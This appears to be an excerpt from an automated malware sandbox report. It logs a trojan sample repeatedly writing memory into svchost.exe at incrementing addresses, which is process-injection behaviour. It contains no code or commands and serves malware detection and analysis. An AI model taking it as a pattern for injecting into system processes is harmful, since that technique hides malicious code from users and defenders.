    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B003AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B003BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B003CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B003DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B003EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B003FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0040Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0041Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0042Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0043Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0044Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0045Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0046Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0047Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0048Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0049Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B004AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B004BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B004CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B004DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B004EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B004FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0050Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0051Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0052Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0053Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0054Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0055Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0056Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0057Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0058Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0059Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B005AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B005BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B005CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B005DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B005EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B005FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0060Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0061Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0062Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0063Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0064Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0065Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0066Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0067Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0068Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0069Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B006AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B006BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B006CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B006DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B006EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B006FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0070Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0071Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0072Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0073Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0074Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0075Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0076Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0077Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0078Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0079Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B007AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B007BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B007CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B007DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B007EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B007FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0080Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0081Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0082Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0083Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0084Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0085Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0086Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0087Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0088Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0089Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B008AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B008BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B008CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B008DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B008EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B008FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0090Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0091Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0092Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0093Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0094Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0095Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0096Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0097Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0098Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0099Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B009AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B009BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B009CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B009DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B009EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B009FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A1Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A2Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A3Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A4Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A5Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A6Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A7Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A8Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00A9Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00AAJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00ABJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00ACJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00ADJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00AEJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00AFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B1Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B2Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B3Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B4Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B5Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B6Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B7Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B8Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00B9Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00BAJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00BBJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00BCJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00BDJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00BEJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00BFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C1Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C2Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C3Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C4Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C5Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C6Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C7Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C8Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00C9Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00CAJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00CBJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00CCJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00CDJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00CEJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00CFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D1Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D2Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D3Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D4Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D5Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D6Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D7Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D8Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00D9Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00DAJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00DBJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00DCJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00DDJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00DEJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00DFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E1Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E2Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E3Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E4Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E5Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E6Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E7Jump to behavior
